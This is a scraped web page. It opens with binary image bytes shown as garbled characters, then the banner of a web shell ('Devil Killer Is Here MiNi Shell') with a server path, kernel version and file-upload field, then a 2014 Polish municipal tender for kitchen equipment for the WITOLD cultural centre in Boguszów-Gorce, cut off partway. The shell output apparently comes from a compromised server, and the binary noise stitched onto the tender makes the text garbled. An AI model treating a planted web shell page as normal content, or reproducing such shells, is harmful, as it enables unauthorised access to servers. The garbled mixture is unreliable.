JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140714/235408-N-2014.html

<p class="kh_header"><b>Boguszów-Gorce: Dostawa, montaż oraz rozruch technologiczny sprzętu wyposażenia kuchni Centrum Kulturalno-Kongresowego WITOLD w Boguszowie-Gorcach w ramach zadania inwestycyjnego pt.: Adaptacja budynku nadszybia z wieżą wyciągową na Centrum Kulturalno-Kongresowe WITOLD przy ul. Traugutta w Boguszowie-Gorcach</b><br>
<b>Numer ogłoszenia: 235408 - 2014; data zamieszczenia: 14.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Boguszów-Gorce , Pl. Odrodzenia 1, 58-370 Boguszów-Gorce, woj. dolnośląskie, tel. 74 8449311 w. 32, faks 74 8449165.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż oraz rozruch technologiczny sprzętu wyposażenia kuchni Centrum Kulturalno-Kongresowego WITOLD w Boguszowie-Gorcach w ramach zadania inwestycyjnego pt.: Adaptacja budynku nadszybia z wieżą wyciągową na Centrum Kulturalno-Kongresowe WITOLD przy ul. Traugutta w Boguszowie-Gorcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje dostawę, montaż oraz rozruch technologiczny sprzętu wyposażenia kuchni Centrum Kulturalno-Kongresowego WITOLD w Boguszowie-Gorcach, zgodnie z zestawieniem  wyposażenia załączonym do SIWZ.
    Do podstawowych obowiązków Wykonawcy należy w dostarczenie wyposażenia objętego przedmiotem zamówienia do miejsca wskazanego przez Zamawiającego, jego montaż we wskazanym miejscu, zgodnie z technologią kuchni wskazaną na rysunku załączonym do SIWZ. Potwierdzeniem realizacji dostawy będzie bezusterkowy protokół odbioru przedmiotu zamówienia, potwierdzający jego kompletność, terminowość i zgodność dostawy.

SPECYFIKACJA WYPOSAŻENIA KUCHNI CKK WITOLD

1. UMYWALKA DO RĄK Z BATERIĄ - SZT. 1
Wymagania:
1. Wymiary: 45x35 cm
2. PIEC KONWEKCYJNO-PAROWY WRAZ Z OKAPEM I PODSTAWĄ POD PIEC -   szt. 1. Piec konwekcyjno-parowy o pojemności 10 GN 1/1 z podstawą i okapem
Wymagania:
1. Minimalne wyposażenie:
Pojemność 10 GN 1/1 
Obudowa - stal nierdzewna 
Sterowanie cyfrowe min 99 programów po 9 kroków każdy 
Zintegrowany czujnik kontroli wilgotności w komorze gotowania 
Automatyczny przedgrzew komory 
System bezpośredniej (natryskowej) produkcji pary 
Nawilżanie manualne 
Automatyczna zmiana kierunku obrotów wentylatora - dwie prędkości 
Zakres temperatury 50-280 st.C 
2. Tryby pracy:
Gotowanie w parze
Pieczenie
Kombinacja pary i gorącego powietrza
Wyposażony w ruszty i pojemniki GN
3. Dane techniczne
Wymiary : ok. 990x860x1090
Zasilanie : 400 V 
3. STÓŁ CHŁODNICZY - SZT. 1
Wymagania:
1. Stół chłodniczy o pojemności komory 4x95l
2. Stół wykonany ze stali nierdzewnej chromowo-niklowej przeznaczony do profesjonalnej gastronomii
3. Wyposażony w elektroniczny sterownik z wyświetlaniem temperatury,
4. Automatyczne odszranianie i odprowadzanie skroplin,
5. Wymuszony obieg powietrza,
6. Samodomykające drzwi
7. Pojemniki GN
8. Wymiary : 2325x600x850

4. REGAŁ OCIEKOWY DO NACZYŃ - SZT. 1
Regał 600/700/1800
Wymagania:
1. Minimum pięć ażurowych półek wykonanych ze stali nierdzewnej chromowo-niklowej o grubości min. 1 mm przeznaczony do osuszania (odciekania) i przechowywania naczyń
2. Wzmacniane półki do przechowywania produktów do min. 100 kg na każdej półce 
3. Konstrukcja regału oparta na kształtownikach o przekroju kwadratowym o wymiarach min. 30x30 mm
4. Wymiary : 60x70x180 cm
5. Wysokość : 180 cm
6. Długość : 60 cm
7. Szerokość : 70 cm
8. Grubość blachy : min. 1 mm

5. STÓŁ Z BASENEM DWUKOMOROWYM 1400/700/850 (400) - SZT. 1
Wymagania:
1. Wykonany ze stali nierdzewnej chromowo-niklowej przeznaczony do ręcznego mycia naczyń o dużej pojemności: garnków, pojemników GN, termosów, wanien itp. wyposażony w baterię ze spryskiwaczem i wylewką.
2. Stelaż basenu oparty na kształtownikach o przekroju kwadratowym o wymiarach min. 40x40 mm
3. Wymiary : 140x70x85 cm
4. Wysokość : 85 cm
5. Długość : 140 cm
6. Szerokość : 70 cm
7. Grubość blachy : min. 1.2 do 1.5 mm
8. Regulacja wys. nóżek : min. -1 do +2 mm
9. Standardowa śr. otworu : min. 5 cm
10. Wys. rantu : min. 4 cm
11. Głębokość komory : min. 40 cm
12. Typ basenu :  2-komorowy
13. Bateria ze spryskiwaczem i wylewką: bateria stojąca do zamontowania w zlewie, typu zlewozmywakowa. 

6. STÓŁ ROBOCZY Z PÓŁKĄ 600/700 - SZT. 1
Wymagania:
1. Wykonany z blachy nierdzewnej chromowo-niklowej o grubości 1 mm
2. Blat stołu wygłuszony płytą wiórową o grubości min. 18 mm klejoną od spodu do blachy klejami spełniającymi wszystkie wymogi dotyczące kontaktu z żywnością 
3. Odporny na działanie wilgoci
4. Stelaż stołu oparty na kształtownikach o przekroju kwadratowym o wymiarach min. 40x40 mm wzmocnienia boczne wykonywane z kształtowników min. 30x30 mm
5. Wymiary : 60x70x85 cm
6. Wysokość : 85 cm
7. Długość : 60 cm
8. Szerokość : 70 cm
9. Grubość blachy : min. 1 mm
10. Regulacja wys. nóżek : min. -1 do +2 cm
11. Wys. rantu : min. 4 cm
12. Półka dolna : tak

7. STÓŁ ZE ZLEWEM, SZAFKĄ I PÓŁKĄ 2000-700-850- SZT. 1
Wymagania:
1. Stół ze zlewem 1-komorowym z szafką z drzwiami otwieranymi wykonany ze stali nierdzewnej chromowo-niklowej przeznaczony do profesjonalnej gastronomi, wyposażony w baterię zlewozmywakową.
2. Grubość blachy komór zlewu od min. 0,8 do 1 mm
3. Wytłoczona komora zlewu o głębokości min. 25 cm, 
4. Gładka, łączenie dokładnie wyszlifowane
5. Drzwi otwierane dwuskrzydłowe pod całą długością stołu
6. Wysokość : 85 cm
7. Długość : 200 cm
8. Szerokość : 70 cm
9. Wymiary komory : min. 40x40 cm
10. Grubość blachy : min. 1.2 do 1.5 mm
11. Standardowa śr. otworu : min. 5 cm
12. Wys. rantu : min. 4 cm
13. Głębokość komory : min. 25 cm
14. Półka dolna : tak
15. Szafka drzwi otwierane : tak
16. Stół prawy
17. 

8. STÓŁ ZE ZLEWEM, SZAFKĄ I PÓŁKĄ 1400-700-850- SZT. 1
Wymagania:
1. Stół ze zlewem 1-komorowym z szafką z drzwiami otwieranymi wykonany ze stali nierdzewnej chromowo-niklowej przeznaczony do profesjonalnej gastronomi, wyposażony w baterię zlewozmywakową.
2. Grubość blachy komór zlewu od min. 0,8 do 1 mm
3. Wytłoczona komora zlewu o głębokości min. 25 cm, 
4. Gładka, łączenie dokładnie wyszlifowane
5. Drzwi otwierane dwuskrzydłowe pod całą długością stołu
6. Wysokość : 85 cm
7. Długość : 140 cm
8. Szerokość : 70 cm
9. Wymiary komory : min. 40x40 cm
10. Grubość blachy : min. 1.2 do 1.5 mm
11. Standardowa śr. otworu : min. 5 cm
12. Wys. rantu : min. 4 cm
13. Głębokość komory : min. 25 cm
14. Półka dolna : tak
15. Szafka drzwi otwierane : tak
16. Stół prawy

9. SZAFKA WISZĄCA 800-300-600- SZT. 1
Wymagania:
1. Szafka z półką i drzwiami wykonana ze stali nierdzewnej chromowo-niklowe
2. Drzwi otwierane dwuskrzydłowe
3. Wysokość : 60 cm
4. Długość : 80 cm
5. Głębokość : 30 cm
10. SZATKOWNICA DO WARZYW - SZT. 1
Wymagania:
1. Wyposażona w system bezpieczeństwa przy otwarciu pokrywy
2. Pojemnik szatkownicy i pokrywa wykonane z metalu
3. Zasilanie: 230-400V 
4. Wydajność: do 250 kg

11. STÓŁ ROBOCZY 1600-700-850 - SZT. 1
Wymagania:
1. Wykonany z blachy nierdzewnej chromowo-niklowej o grubości 1 mm
2. Blat stołu wygłuszony płytą wiórową o grubości min. 18 mm klejoną od spodu do blachy klejami spełniającymi wszystkie wymogi dotyczące kontaktu z żywnością 
3. Odporny na działanie wilgoci
4. Stelaż stołu oparty na kształtownikach o przekroju kwadratowym o wymiarach min. 40x40 mm wzmocnienia boczne wykonywane z kształtowników min. 30x30 mm
5. Wymiary : 160x70x85 cm
6. Wysokość : 85 cm
7. Długość : 160 cm
8. Szerokość : 70 cm
9. Grubość blachy : min. 1 mm
10. Regulacja wys. nóżek : min. -1 do +2 cm
11. Wys. rantu : min. 4 cm

12. KUCHNIA ELEKTR. PODST. OTWARTA 6-PŁYT. - SZT. 1
Wymagania:
1. Kuchnia elektryczna 6-płytowa wolnostojąca wykonana ze stali nierdzewnej
2. Stelaż z półką dolną
3. Zasilanie : 400 V
4. Moc całkowita : max. 21 kW
5. Liczba płyt : 6 szt
6. Wymiary: 1200x700x850
7. Moc płyt : 4x2.6+2x2 kW
8. Moc piekarnika: 6,5 kW
9. Rodzaj zasilania: elektryczne, 
10. Piekarnik grzanie: góra - dół, góra, dół,
11. Zakres temperatur: płynna regulacja od 50 do 250 st. C

13. OKAP ELEKTRYCZNY - SZT. 1
Wymagania:
1. Okap elektryczny wykonana ze stali nierdzewnej
2. Łapacz tłuszczu
3. Wentylator z modułem sterowania wydajności
4. Oświetlenia
5. Przepustnica regulacyjna
6. System przeciwpożarowy
7. Wymiary: 1800x1000x400

14. STÓŁ ROBOCZY Z SZUFLADAMI 400-700 - SZT. 3
Wymagania:
1. Wykonany z blachy nierdzewnej chromowo-niklowej o grubości 1 mm
2. Blat stołu wygłuszony płytą wiórową o grubości min. 18 mm klejoną od spodu do blachy klejami spełniającymi wszystkie wymogi dotyczące kontaktu z żywnością 
3. Odporny na działanie wilgoci
4. Stelaż stołu oparty na kształtownikach o przekroju kwadratowym o wymiarach min. 40x40 mm wzmocnienia boczne wykonywane z kształtowników min. 30x30 mm
5. Wymiary : 40x70x85 cm
6. Wysokość : 85 cm
7. Długość: 40 cm
8. Głębokość: 70 cm
9. Grubość blachy : min. 1 mm
10. Regulacja wys. nóżek : min. -1 do +2 cm
11. Wys. rantu : min. 4 cm
12. Szuflady: tak 2 szt.
 
15. BEMAR STACJONARNY - SZT. 1
Wymagania:
1. Bemar elektryczny stacjonarny z szafką elektryczną o pojemności 3xGN1-1 
2. Wykonana ze stali nierdzewnej
3. Typ wodny
4. Ilość komór: 3
5. Moc całkowita : max. 2,4 kW
6. Niezależne sterowanie komór
7. Wymiary: 1090x700x850

16. STÓŁ ROBOCZY 900-600-850 - SZT. 1
Wymagania:
1. Wykonany z blachy nierdzewnej chromowo-niklowej o grubości 1 mm
2. Blat stołu wygłuszony płytą wiórową o grubości min. 18 mm klejoną od spodu do blachy klejami spełniającymi wszystkie wymogi dotyczące kontaktu z żywnością 
3. Odporny na działanie wilgoci
4. Stelaż stołu oparty na kształtownikach o przekroju kwadratowym o wymiarach min. 40x40 mm wzmocnienia boczne wykonywane z kształtowników min. 30x30 mm
5. Wymiary : 90x60x85 cm

17. STÓŁ CHŁODNICZY - SZT. 1
Wymagania:
1. Stół chłodniczy o pojemności komory 2x95l
2. Stół wykonany ze stali nierdzewnej chromowo-niklowej przeznaczony do profesjonalnej gastronomii
3. Wyposażony w elektroniczny sterownik z wyświetlaniem temperatury,
4. Automatyczne odszranianie i odprowadzanie skroplin,
5. Wymuszony obieg powietrza,
6. Samodomykające drzwi
7. Pojemniki GN
8. Wymiary : 1325x600x850

18. SZAFA PRZELOTOWA 1100-700-2000 - SZT. 1
Wymagania:
1. Wykonana z blachy nierdzewnej chromowo-niklowej o grubości 1 mm
2. Moduły szafy
3. Wymiary : 110x70x200 cm

19. UMYWALKA DO RĄK Z BATERIĄ - SZT. 1
Wymagania:
1. Wymiary: 45x35 cm

20. PŁYTA BEZPOŚREDNIEGO SMAŻENIA - SZT. 1
Wymagania:
1. Płyta bezpośredniego smażenia elektryczna 1-2G+1-2R z podstawą szafkową z drzwiami
2. Moc: 8,0 kW
3. Zasilanie : 400 V
4. Wymiary: 600x700x850
5. Płyta: powierzchnia chromowana ryflowana i gładka
21. FRYTOWNICA ELEKTRYCZNA - SZT. 1
Wymagania:
1. Frytownica elektryczna o pojemności roboczej 20l z podstawą szafkową z drzwiami
2. Moc: 12,0 kW
3. Zasilanie : 400 V
4. Wymiary: 600x700x850
5. Ilość komór: 2

22. KOCIOŁ WARZELNY - SZT. 1
Wymagania:
1. Kocioł warzelny o pojemności 60l 
2. Wykonana ze stali nierdzewnej
3. Zasilanie: 400 V
5. Moc: max. 9,0 kW
6. Wymiary: 700x700x850

23. OKAP ELEKTRYCZNY CENTRALNY - SZT. 1
Wymagania:
1. Okap elektryczny wykonana ze stali nierdzewnej
2. Łapacz tłuszczu
3. Wentylator z modułem sterowania wydajności
4. Oświetlenia
5. Segmenty: 2
6. Przepustnica regulacyjna
7. System przeciwpożarowy
8. Wymiary: 2x1500x1200x400

24. REGAŁ Z PÓŁKAMI PRZESTAWNYMI - SZT. 2
Regał 1400-600-1800
Wymagania:
1. Regał z półkami przestawnymi ze stali nierdzewnej
2. Wymiary : 140x60x180 cm

25. SZAFKA NA ŚRODKI CZYSTOŚCI 500-500-1800- SZT. 1
Wymagania:
1. Szafka z półkami i drzwiami wykonana ze stali nierdzewnej chromowo-niklowe
2. Drzwi otwierane jednoskrzydłowe
3. Wymiary: 50x50x180 cm

26. ZLEW PORZĄDKOWY - SZT. 1
Wymagania:
1. Wymiary: 500x400 cm
2. Wykonana ze stali nierdzewnej chromowo-niklowe
27. STÓŁ WYŁADOWCZY DO ZMYWAREK 800-700-850 - SZT. 1
Wymagania:
1. Wykonany z blachy nierdzewnej chromowo-niklowej o grubości 1 mm
2. Wymiary : 80x70x85 cm

28. ZMYWARKA KAPTUROWA DO TALERZY I SZKŁA - SZT. 1
Wymagania:
1. Zmywarka gastronomiczna do mycia szkła, talerzy i sztućców
2. Automatyczny start po zamknięciu kaptura
3. Wykonanie: stal nierdzewna
4. Dwa cykle mycia 90-180 s
5. Wymiary : dostosowane do technologii kuchni
6. Zasilanie : 230 V
7. Pojemność wanny : min 50 l
8. Pojemność bojlera : min 9 l
9. Wymiary kosza : min 50x50 cm
10. Minimalne wyposażenie zmywarki oraz parametry:
	dozownik płynu płuczącego 
	dozownik płynu myjącego
	kosze o wymiarach 50x50 cm: na szkło, na sztućce, na talerze
	przewód zasilający
	przewody zasilania wodą i odpływu 

29. STÓŁ ZAŁADOWCZY DO ZMYWAREK 1000-700-850 - SZT. 1
Wymagania:
1. Wykonany z blachy nierdzewnej chromowo-niklowej o grubości 1 mm, wyposażony w baterię zlewozmywakową.
2. Wymiary : 100x70x85 cm

30. STÓŁ ROBOCZY 800-700-850 - SZT. 1
Wymagania:
1. Wykonany z blachy nierdzewnej chromowo-niklowej o grubości 1 mm
2. Blat stołu wygłuszony płytą wiórową o grubości min. 18 mm klejoną od spodu do blachy klejami spełniającymi wszystkie wymogi dotyczące kontaktu z żywnością 
3. Odporny na działanie wilgoci
4. Stelaż stołu oparty na kształtownikach o przekroju kwadratowym o wymiarach min. 40x40 mm wzmocnienia boczne wykonywane z kształtowników min. 30x30 mm
5. Wymiary : 80x70x85 cm

31. WÓZEK KELNERSKI - SZT. 2
Wymagania:
1.  Wózek kelnerski wykonany ze stali nierdzewnej
2. Wymiary: 810x545x900

32. SZAFA CHŁODNICZA - SZT. 1
Wymagania:
1. Szafa wykonany ze stali nierdzewnej 
2. Pojemność 700 l
3. Wyposażona w zamodomykające drzwi oraz monitoring
4. Wymiary : 700x860x2000

33. SZAFA MROŹNICZA - SZT. 1
Wymagania:
1. Szafa wykonany ze stali nierdzewnej 
2. Pojemność 700 l
3. Wyposażona w zamodomykające drzwi oraz monitoring
4. Wymiary : 700x860x2000

34. STÓŁ DO POMIESZCZENIA SOCJALNEGO - SZT. 1
Wymagania:
1. Wymiary : 1200x600x850
2. Wykonanie płyta MDF
3. Podstawa chromowana

35. KRZESŁO DO POMIESZENIA SOCJALNEGO - SZT. 2

36. SZAFKA UBRANIOWA DWUDZIELNA - SZT. 2
Wymagania:
1. Wymiary: 40x50x180 cm
2. Wykonanie: szafka metalowa

37. ZLEWOZMYWAK - SZT. 1
Wymagania:
1. Zlewozmywak jednokomorowy obudowany szafką typu domowego z ociekaczem .
2. Zlewozmywak obudowany szafką
3. Zlewozmywak wyposażony w baterię
4. Wymiary: 100x60x85 cm

38. WYMIENNIK CIEPŁEJ WODY UŻYTKOWEJ - SZT. 1
Wymagania:
1.	Wymiennik cwu 200 l w wersji wiszącej
2.	Pozycja pracy: pozioma
3.	Wymiennik z wężownicą i grzałką elektryczną


39. EKSPRES CIŚNIENIOWY DO KAWY - SZT. 1
Wymagania:
1. Ekspres ciśnieniowy trzygrupowy elektroniczny
2.  Pojemność bojlera: 18 l
3. Ciśnienie zaparzania: 8-9 bar
5. Ciśnienie pompy: 16 bar
6. Moc całkowita : max. 5 kW
7. Temperatura zaparzania 93 - 97 st C

40. KUCHENKA MIKROFALOWA - SZT. 1
Wymagania:
1.  Funkcje: opiekanie, grill, rozmrażanie, podgrzewanie
2. Sterowanie elektroniczne
3. Wyświetlacz: tak
4. Pojemność: powyżej 20l.
5. Talerz obrotowy: tak
6. Moc: powyżej 1000W

41. KASA FISKALNA - SZT. 1

WYMAGANIA DODATKOWE:
1. Zamówienie dotyczy dostawy, montażu i uruchomienia.
2. Uruchomienie poprzez włączenie do istniejącej instalacji elektrycznej, instalacji wod-kan, instalacji wentylacyjnej, c.o. (podłączenie wymiennika cwu). 
3. Gwarancja na dostarczone przez Wykonawcę elementy wyposażenia kuchni min. 24m-c..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-0, 39.14.12.00-0, 39.14.13.00-0, 39.22.10.00-0, 39.71.31.00-0, 39.71.11.10-0, 39.71.13.61-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu o udzielenie zamówienia publicznego wymaga wniesienia wadium w wysokości 3 500 PLN.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.
 Opis sposobu dokonywania oceny spełniania tego warunku:  Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał/wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedno zadanie polegające na dostawie wyposażenia kuchennego wraz z jego montażem i uruchomieniem, o wartości brutto min. 50 000 PLN - załącznik nr 4. Przez jedno zadanie Zamawiający rozumie realizację zamówienia w ramach jednej umowy.
Uwaga!: Sytuacja, w której Wykonawca będzie polegał na wiedzy i doświadczeniu innego podmiotu(ów) winien złożyć w szczególności pisemne zobowiązanie tego podmiotu(ów) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, na zasadach określonych w pkt.I.5.1).
W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie zamówienia, oceniane będą łącznie wiedza i doświadczenie.
Ocena spełnienia warunku dokonana będzie w formule spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.
 Opis sposobu dokonywania oceny spełniania tego warunku:  Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.
 Opis sposobu dokonywania oceny spełniania tego warunku:  Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.
 Opis sposobu dokonywania oceny spełniania tego warunku:  Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

